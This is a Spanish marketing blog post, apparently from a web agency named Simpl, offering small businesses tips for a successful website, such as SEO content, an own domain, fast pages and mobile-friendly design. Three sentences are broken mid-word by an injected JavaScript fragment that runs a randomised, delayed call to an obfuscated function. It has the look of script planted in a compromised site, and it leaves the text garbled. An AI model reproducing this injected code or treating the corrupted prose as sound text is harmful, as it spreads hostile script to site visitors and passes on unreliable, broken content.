Para tener un sitio web exitoso no es necesario invertir grandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andes cantidades de dinero. Para las pequeñas y medianas empresas lo que se busca con el sitio web es generar y hacer crecer los ingresos; para esto no necesitas invertir mucho dinero en publicidad o contratar un ingeniero especializado que se encargue de construir y manejar tu sitio web.

Para tener una página web exitosa te damos los siguientes consejos:

  • Ofrece información valiosa y gratis a tus clientes; si eres un experto en el tema, no será difícil para ti compartir contenido que le interese a tus usuarios. Además esto sirve para mejorar el posicionamiento (SEO) de tu página.
  • Tener un dominio propio; esto le da credibilidad y confianza a los visitantes.
  • Una página liviana, en la que las imágenes y demás contenido, como videos y audios, carguen rápidamente evitará el rebote y ayuda a que los visitantes permanezcan en el site.
  • Si tu sitio web es un E-Commerce, debes ofrecer alternativas de pago y entrega; estas posibilidades harán que los clientes se sientan más cómodos a la hora de comprar.
  • Emailing; para asegurar el éxito de tu empresa en la web debes mantener contacto con tus visitantes y posibles clientes, a través del correo electrónico podrá tener contacto con su audiencia y mantenerla actualizada en sus productos y servicios.
  • Al momento de diseñar tu sitio web debes tener en cuenta que este debeandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andonos-a-un-nuevo-entorno/” target=”_blank”> funcionar en todos los navegadores, desde los más viejos hasta los más actualizados, inclusive debe ser visible desde dispositivos móviles manteniendo un diseño amigable para estos últimos.
  • Aproveche las herramientas que el internet pone a su disposición, gracias a esta podrá expandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andir su negocio y llegar a miles de personas.

En Simpl, queremos hacerte las cosas simples, por eso, todo nuestro equipo está especializado en hacer tu experiencia en la web la más cómoda y placentera, donde tú solo te preocupes por manejar tu negocio, y nosotros nos encargamos de manejar tu página y redes sociales empresariales para que evites caer en los errores que hacen que tu web site fracase.

Compartir...Share on FacebookShare on Google+Tweet about this on Twitter